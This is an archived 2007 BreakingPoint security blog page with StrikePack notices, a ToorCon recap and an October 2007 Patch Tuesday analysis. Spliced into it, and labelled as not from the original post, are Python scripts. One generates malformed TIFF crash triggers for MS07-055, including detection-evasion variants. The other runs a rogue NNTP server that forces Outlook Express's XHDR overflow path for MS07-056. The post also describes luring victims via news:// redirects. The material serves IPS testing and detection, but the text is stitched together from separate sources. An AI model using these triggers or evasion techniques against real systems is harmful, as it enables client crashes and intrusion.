
StrikePack 16508 Released

StrikePack 16508 is now available to BreakingPoint customers. This StrikePack adds nineteen new strikes covering nine new vulnerabilities.

Posted by Todd Manning (2007-10-31 19:09:25)

StrikePack 16220 Released

StrikePack 16220 is now available to BreakingPoint customers. This release contains ten new strikes covering six new vulnerabilities.

Posted by Todd Manning (2007-10-25 12:09:16)

ToorCon 9 and Context-keys

Late last night I returned from ToorCon 9 in San Diego. I was able to make it out on time without any objections from the raging fires, but others I know were not quite as lucky. Even though the conference was awesome and San Diego, as always, had beautiful weather, it's nice to be back in Austin. This year I spoke at ToorCon on the subject of context-keyed payload encoders. You can view both the slides and video at my personal website if you're so inclined. For an extensive review of ToorCon 9 and all of the talks I attended, please click-through to my personal blog.

Posted by Dustin D. Trammell (2007-10-23 15:31:44)

Toorcon Wrap-Up

Now that all is said and done, Toorcon 9 was a smashing success! It was well stocked on great talks and good people and, of course, the after parties were wild fun.

There was a strong theme of automated exploitation this year. Three of the talks that I saw focused on the subject. First up is Jerome Athias, who impressed everyone with his presentation's 3D graphical cinema introduction and then impressed again with his toolkit (written in an IDE called WinDev) for writing exploit modules for the Metasploit Framework in only a minute or two.

Another great talk was given by Jason Medeiros. He started off describing his methodology for detecting different types of crashes and followed up with a cool demo. He had written "from scratch" a complete debugger and heap analyzer. His program took a custom fuzzer definition and a binary as input. A few moments later, his demo generated a C exploit for the stack overflow that his fuzzer had just found.

Then there's the talk given by Nathan Rittenhouse and Johnny Cache. Their talk was focused on Byakugan, a WinDbg plugin. Byakugan is filled with goodies, but the real show stopper was the 3d-accelerated heap visualization. Nathan also gave a demo of his new Ruby replacement for pydbg, which seems to be exactly what I have been looking for. This should be posted to http://noxusfiles.com/ soon. Thanks, Nathan!

Posted by Sean Bradly (2007-10-22 17:05:23)

StrikePack 15863 Released

StrikePack 15863 is now available to BreakingPoint customers. This release contains nine new strikes covering seven new vulnerabilities.

Posted by Todd Manning (2007-10-17 13:17:44)

StrikePack 15557 Released

StrikePack 15557 is now available to BreakingPoint customers. This release contains ten new strikes covering three new vulnerabilities.

Posted by Todd Manning (2007-10-11 16:57:15)

October 2007 Microsoft Tuesday

Every Microsoft Tuesday is busy here at BreakingPoint Systems, with the entire Strike Team poring over patches, looking at IDA disassemblies, pondering BinDiff graphs, and writing exploits. From early Tuesday morning we (and our scripts) are monitoring the Windows update site in order to get the patches and bug descriptions as soon as they become available. After that, a quick game of who's-got-what-bug, and we're off to the races.

The October 2007 Microsoft patches cover the following issues:

MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution
References: CVE-2007-2217

The MS07-055 bulletin addresses an issue with Kodak Image Viewer in the mishandling of TIFF images. TIFF files begin with an 8-byte header which consists of a byte-order indicator (bytes 0-1, "II" for little-endian or "MM" for big-endian), the value 42 (bytes 2-3), and the offset in bytes of the first Image File Directory (IFD) (bytes 4-7), which allows the IFD to be located anywhere in the file. An IFD consists of a count of the number of directory entries (2 bytes) followed by a sequence of 12-byte entries, followed by a 4-byte offset of the next IFD (or 0 if none). A valid TIFF file must contain at least one IFD.

The bug lies in the application's processing of a particular IFD entry, BitsPerSample. Like every IFD entry, it consists of a 2-byte tag (258), a 2-byte type (3, SHORT), a 4-byte count of values, and a 4-byte field that holds either the values themselves, when they fit in four bytes, or the offset at which the values are located. A BitsPerSample entry with three samples (as in an RGB image) needs six bytes, so its last field is an offset. To trigger the bug, set that offset to an arbitrary value, for example one far past the end of the file; when the parser attempts to read the values from that location, the application crashes. This crash is currently being investigated further by the BreakingPoint Strike Team in order to determine exactly where the application faults and to develop a proof-of-concept exploit for the bug.

Example TIFF file and the crash caught in windbg: shown as images in the original post.
There are three important variations to consider with exploitation of this bug. First is the byte-ordering indicator in the TIFF header. Since TIFF files can come in both byte orders, it is important to test your inline security device's coverage for this bug using both big- and little-endian TIFF files containing the attack. Second is the IFD offset field. Modifying the IFD offset in the TIFF file can aid in evading detection by devices that expect the IFD to be located near the beginning of the TIFF file. Multiple IFD entries can also be chained by using the offset to the next IFD, which requires the inline security device to parse down the entire chain of IFD entries. And finally, with file format bugs such as this, an attacker can use multiple network protocols for getting the malicious file into a victim's network. BreakingPoint includes tests covering HTTP, SMTP, POP3, and IMAP4 for most file format bugs in our strikeset.
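The following is an added example, not code from the original post or from BreakingPoint: it builds TIFF files that carry the structural trigger described above (a three-sample BitsPerSample entry whose offset points outside the file) in every variation just listed, that is, either byte order, the IFD placed anywhere in the file, and a chain of decoy IFDs in front of the bad one, and it walks those files the way an inline device has to. The header and IFD layout follow the TIFF 6.0 structure described above; the particular tag set, the 1x1 image dimensions, the sample values, and the slack/decoy sizes are this example's own choices, and the files only contain the malformed structure, they are not a working exploit.

```python
"""Generate MS07-055-style TIFF triggers in all structural variations and
check them by walking the full IFD chain (added example, not the post's code)."""
import struct

BITS_PER_SAMPLE = 258
SHORT, LONG = 3, 4
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}   # BYTE, ASCII, SHORT, LONG, RATIONAL
IFD_BYTES = 2 + 6 * 12 + 4                    # every IFD built here has 6 entries


def _entry(e, tag, typ, count, value_or_offset):
    """One 12-byte directory entry. A single value that fits in 4 bytes is
    stored inline (left-justified); anything larger is an offset into the file."""
    hdr = struct.pack(e + "HHI", tag, typ, count)
    if TYPE_SIZE[typ] * count <= 4:
        assert count == 1, "inline multi-value entries are not needed here"
        return hdr + struct.pack(e + {SHORT: "H", LONG: "I"}[typ], value_or_offset).ljust(4, b"\x00")
    return hdr + struct.pack(e + "I", value_or_offset)


def _ifd(e, entries, next_ifd):
    return struct.pack(e + "H", len(entries)) + b"".join(entries) + struct.pack(e + "I", next_ifd)


def build_tiff(little_endian=True, first_ifd=8, benign_ifds=0, bps_offset=0xFFFFFF00):
    """Return a 1x1 TIFF whose last IFD carries a 3-value BitsPerSample entry.
    bps_offset=None yields a well-formed file (values appended after the IFDs);
    any other value is written verbatim as the bogus offset of the sample values."""
    assert first_ifd >= 8
    e = "<" if little_endian else ">"
    out = bytearray(struct.pack(e + "2sHI", b"II" if little_endian else b"MM", 42, first_ifd))
    out += b"\x00" * (first_ifd - len(out))     # slack that pushes the IFD deeper into the file

    def ifd(bits_entry, samples_per_pixel, next_ifd):
        return _ifd(e, [
            _entry(e, 256, SHORT, 1, 1),                 # ImageWidth
            _entry(e, 257, SHORT, 1, 1),                 # ImageLength
            bits_entry,                                  # BitsPerSample (tag 258)
            _entry(e, 262, SHORT, 1, 2),                 # PhotometricInterpretation = RGB
            _entry(e, 273, LONG, 1, 8),                  # StripOffsets (irrelevant here)
            _entry(e, 277, SHORT, 1, samples_per_pixel), # SamplesPerPixel
        ], next_ifd)

    pos = first_ifd
    for _ in range(benign_ifds):                         # decoy IFDs that just chain onward
        pos += IFD_BYTES
        out += ifd(_entry(e, BITS_PER_SAMPLE, SHORT, 1, 8), 1, pos)
    # Three SHORT samples need 6 bytes, so this entry's last field is an offset.
    values_at = pos + IFD_BYTES if bps_offset is None else bps_offset
    out += ifd(_entry(e, BITS_PER_SAMPLE, SHORT, 3, values_at), 3, 0)
    if bps_offset is None:
        out += struct.pack(e + "HHH", 8, 8, 8)
    return bytes(out)


def check_bits_per_sample(data, max_ifds=64):
    """Follow the IFD chain from wherever the header points, in either byte
    order, and flag BitsPerSample entries whose out-of-line values lie outside
    the file. Returns a list of (ifd_index, what, offset, reason)."""
    if len(data) < 8 or data[:2] not in (b"II", b"MM"):
        raise ValueError("not a TIFF")
    e = "<" if data[:2] == b"II" else ">"
    magic, offset = struct.unpack_from(e + "HI", data, 2)
    if magic != 42:
        raise ValueError("bad TIFF magic")
    findings, seen, index = [], set(), 0
    while offset and index < max_ifds:
        if offset in seen or offset + 2 > len(data):
            findings.append((index, "IFD", offset, "loop or IFD outside file"))
            break
        seen.add(offset)
        (n,) = struct.unpack_from(e + "H", data, offset)
        end = offset + 2 + 12 * n + 4
        if end > len(data):
            findings.append((index, "IFD", offset, "truncated IFD"))
            break
        for i in range(n):
            tag, typ, count, last = struct.unpack_from(e + "HHII", data, offset + 2 + 12 * i)
            size = TYPE_SIZE.get(typ, 0) * count
            if tag == BITS_PER_SAMPLE and size > 4 and last + size > len(data):
                findings.append((index, "BitsPerSample", last, "values outside file"))
        (offset,) = struct.unpack_from(e + "I", data, end - 4)
        index += 1
    return findings


def trigger_variants():
    """Eight structural variants (byte order x IFD placement x decoy chain)."""
    out = {}
    for le in (True, False):
        for first in (8, 512):
            for chain in (0, 3):
                out[f"{'le' if le else 'be'}-ifd@{first}-chain{chain}"] = build_tiff(le, first, chain)
    return out
```

Every variant from `trigger_variants()` is reported by `check_bits_per_sample`, and only the last IFD in the chain is flagged; a file built with `bps_offset=None` passes clean. A checker that only looked at little-endian files, or only at an IFD within the first few hundred bytes, would miss half or more of these, which is exactly the coverage gap described below.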

The BreakingPoint Strike Team performed independent testing of one inline security device after applying the vendor's security pack that included coverage for this bug, and found an interesting result. It appears that the signature for this bug lacks sufficient coverage for all the cases given above. We found that this particular inline security device only provides coverage for MS07-055 when all of the following conditions are met:
  1. The transport is HTTP
  2. The TIFF file is encoded using little-endian byte ordering
  3. The IFD structure is located within the first 310 bytes of the file
Here is a graph showing the detection rate of this inline security device for the 8 strikes covering this particular bug:


What these results indicate is that 8 strikes were sent through the device, and 0 were detected. This indicates insufficient coverage for this vulnerability by this particular device.

Multiple strikes covering various transports and formats for this bug will be included in the StrikePack released on October 11, 2007.

MS07-056
Security Update for Outlook Express and Windows Mail
References: CVE-2007-3897

The MS07-056 bulletin addresses an issue with the mishandling of NNTP server responses to the XHDR command. To exploit this bug, an attacker needs to cause the victim to connect to an NNTP server under the attacker's control. The easiest way to do this is HTTP redirection (an HTTP 301 response whose Location points at a news:// URL, a meta refresh in the HTML, or similar), because this requires no user interaction beyond visiting the attacker-controlled page. The URL will look something like news://news.breakingpointsystems.com/alt.news.breakingpoint.

When Outlook Express interacts with a real NNTP server, the conversation between the client and server typically goes something like this:
		< Client Initiates Connection >
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: MODE READER
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: GROUP alt.news.breakingpoint
Server: 211 1 1003 1265 alt.news.breakingpoint
Client: XOVER 1003-1265
Server: 224 Overview Information Follows
Server: < Overview of group articles >
< Client makes requests based on user input >
In order to trigger this bug, we must get the client to issue the XHDR command. XHDR is similar to XOVER, except the client requests information about a specific header for a range of articles. A series of XHDR commands will request information about individual headers, including the From, Subject, Date, Message-ID, References, and Xrefs headers of all the articles in the group. So, how can we force Outlook Express to send the XHDR command to the server? The key is to send an error response to the XOVER command, causing the client to fall back to using XHDR.

The conversation between the client and our modified server goes like this:
		< Client Initiates Connection >
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: MODE READER
Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
Client: GROUP alt.news.breakingpoint
Server: 211 1 1003 1265 alt.news.breakingpoint
Client: XOVER 1003-1265
Server: 500 Error
Client: XHDR subject 1003-1265
Server: < Overflow of article subject headers >
< Client crashes >
In response to the first XHDR command, the attacker's server returns more article header lines than the client expects; the client expects at most as many as the article count the server gave in its GROUP reply. After receiving that reply, Outlook Express crashes with what looks like heap corruption.
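The modified conversation above, scripted end to end as an added example (not code from the original post or from BreakingPoint). The server side answers like a real NNTP server until XOVER, refuses it with a 5xx so the client falls back to XHDR, and then returns far more subject lines than the group's advertised article count. The client here is a minimal stand-in that implements only the XOVER-to-XHDR fallback; it is not Outlook Express and does not crash. The two sides talk over a local socketpair, the 221 code on the XHDR reply is taken from RFC 2980 rather than from the post, and the 5000-line reply size and 200-character subjects are arbitrary choices.

```python
"""Rogue NNTP server forcing the XHDR fallback, with a scripted client and a
detection heuristic (added example, not the post's code)."""
import socket
import threading

GROUP = "alt.news.breakingpoint"
FIRST, LAST = 1003, 1265            # article range the server advertises
ADVERTISED_COUNT = 1                # count field of the 211 reply shown in the post
BANNER = "200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed"


def rogue_server(conn, excess_lines=5000):
    """Serve exactly one client on `conn` following the modified conversation."""
    f = conn.makefile("rwb")

    def send(line):
        f.write((line + "\r\n").encode("ascii"))
        f.flush()

    send(BANNER)
    while True:
        raw = f.readline()
        if not raw:
            break
        verb = raw.decode("ascii", "replace").strip().split(" ", 1)[0].upper()
        if verb == "MODE":
            send(BANNER)
        elif verb == "GROUP":
            send(f"211 {ADVERTISED_COUNT} {FIRST} {LAST} {GROUP}")
        elif verb == "XOVER":
            send("500 Error")                        # force the XHDR fallback
        elif verb == "XHDR":
            send("221 Header follows")               # RFC 2980 success code (assumed)
            for n in range(FIRST, FIRST + excess_lines):   # far more than advertised
                send(f"{n} {'A' * 200}")
            send(".")
        elif verb == "QUIT":
            send("205 closing")
            break
        else:
            send("500 Unknown command")
    f.close()
    conn.close()


def reader_client(conn):
    """Minimal newsreader: MODE READER, GROUP, XOVER, and XHDR only if XOVER fails."""
    f = conn.makefile("rwb")

    def recv():
        return f.readline().decode("ascii", "replace").rstrip("\r\n")

    def cmd(line):
        f.write((line + "\r\n").encode("ascii"))
        f.flush()
        return recv()

    def drain():                                    # read a multi-line reply up to "."
        lines = []
        while True:
            line = recv()
            if line in (".", ""):
                return lines
            lines.append(line)

    transcript = [recv(), cmd("MODE READER")]       # banner, MODE READER reply
    group_reply = cmd(f"GROUP {GROUP}")
    transcript.append(group_reply)
    _, count, first, last = group_reply.split()[:4]
    xover_reply = cmd(f"XOVER {first}-{last}")
    transcript.append(xover_reply)
    used_xhdr, headers = False, []
    if xover_reply.startswith("224"):
        headers = drain()
    elif xover_reply.startswith("5"):               # fall back exactly as described
        used_xhdr = True
        transcript.append(cmd(f"XHDR subject {first}-{last}"))
        headers = drain()
    transcript.append(cmd("QUIT"))
    f.close()
    conn.close()
    return {"transcript": transcript, "used_xhdr": used_xhdr,
            "advertised": int(count), "received": len(headers)}


def run_exchange(excess_lines=5000):
    """Run server (thread) and client over a socketpair; return what the client saw."""
    srv, cli = socket.socketpair()
    t = threading.Thread(target=rogue_server, args=(srv, excess_lines))
    t.start()
    result = reader_client(cli)
    t.join()
    return result


def looks_like_xhdr_overflow(result):
    """Detection heuristic for a device watching this exchange: the XHDR reply
    carried more article lines than the GROUP reply advertised."""
    return result["used_xhdr"] and result["received"] > result["advertised"]
```

The point of the heuristic is that the trigger is not a single bad line but a mismatch between two server replies (the 211 article count and the number of XHDR lines), so a device has to track the GROUP reply to judge the XHDR reply.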



Coverage for this bug will be included in the StrikePack released on October 11, 2007.

MS07-057
Cumulative Security Update for Internet Explorer
References: CVE-2007-3893, CVE-2007-3892, CVE-2007-1091, CVE-2007-3826

The MS07-057 bulletin addresses four vulnerabilities across multiple versions of Internet Explorer. Three of these are address bar spoofing issues involving the onunload and onbeforeunload event handlers. These spoofing issues can be annoying, but present a low level of risk. A demonstration of one of these flaws can be found on Michal Zalewski's IETrap3 page. The fourth issue is rated critical by Microsoft and allows arbitrary code execution. The Secunia advisory states that the bug occurs when multiple file downloads are queued at the same time. The BreakingPoint Strike Team is still working on this flaw and hopes to reproduce it in time for the upcoming StrikePack.

MS07-058
Vulnerability in RPC Could Allow Denial of Service

The MS07-058 bulletin addresses a denial of service flaw in the RPCSS service. The Microsoft RPC Service (RPCSS) is vulnerable to a denial of service triggered during authentication by including malformed NTLMSSP authentication data inside the DCERPC traffic. The result is a crash inside rpcrt4.dll which terminates the RPCSS service and ultimately results in a reboot of the entire system. The BreakingPoint Strike Team is currently working on providing coverage for this vulnerability.

MS07-059
Vulnerability in Windows SharePoint Services Could Result in Elevation of Privilege

The MS07-059 bulletin addresses a cross-site scripting (XSS) vulnerability in the SharePoint service. This vulnerability can be used to hijack the session of another SharePoint user, if the attacker can convince the victim to access a specific URL after authenticating with the SharePoint server. We have reproduced this in-house and plan on including coverage for this flaw in the upcoming StrikePack.

MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution

The MS07-060 bulletin addresses a memory corruption vulnerability in Microsoft Word 2002. At this time, we have not been able to reproduce this flaw or locate an example exploit. As far as we can tell, most security vendors are using the same sample file to develop their signatures, and are not looking for the actual vulnerability.

Posted by Todd Manning (2007-10-10 14:22:05)

StrikePack 15300 Released

StrikePack 15300 is now available to BreakingPoint customers. This release contains ten new strikes covering nine new vulnerabilities.

Posted by HD Moore (2007-10-05 18:50:42)
© 2005-2008 BreakingPoint Systems, Inc. All rights reserved.